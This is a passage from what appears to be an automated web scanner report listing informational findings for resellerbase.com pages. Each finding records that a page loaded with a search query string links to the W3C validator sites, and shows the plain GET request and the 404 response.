Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.232. http://www.resellerbase.com/detail/46/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/46/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/46/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.233. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.234. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.235. http://www.resellerbase.com/detail/46/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.236. http://www.resellerbase.com/detail/46/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.237. http://www.resellerbase.com/detail/5/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/5/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.238. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.239. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.240. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.241. http://www.resellerbase.com/detail/5/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.242. http://www.resellerbase.com/detail/5/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.243. http://www.resellerbase.com/detail/6/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/6/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.244. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.245. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.246. http://www.resellerbase.com/detail/6/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.247. http://www.resellerbase.com/detail/6/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.248. http://www.resellerbase.com/detail/7/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/7/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
